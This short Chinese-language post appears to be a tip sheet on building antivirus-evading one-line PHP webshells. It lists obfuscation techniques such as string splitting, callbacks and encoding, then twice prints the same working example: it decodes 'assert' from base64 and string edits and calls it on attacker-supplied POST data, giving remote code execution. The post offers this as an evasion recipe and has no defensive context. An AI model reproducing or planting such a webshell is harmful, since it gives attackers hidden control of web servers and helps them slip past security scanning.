制作免杀一句话思路
- 函数替换
- 函数字符串拆分组合
- 自定义函数
- 回调函数
- 编码绕过
比如PHP
<?php
$a = base64_decode(\'YXNzZXh4\');
$a = substr_replace($a,\'rt\',4);
$a($_POST[\'x\']);
?>
比如PHP
<?php
$a = base64_decode(\'YXNzZXh4\');
$a = substr_replace($a,\'rt\',4);
$a($_POST[\'x\']);
?>
相关文章: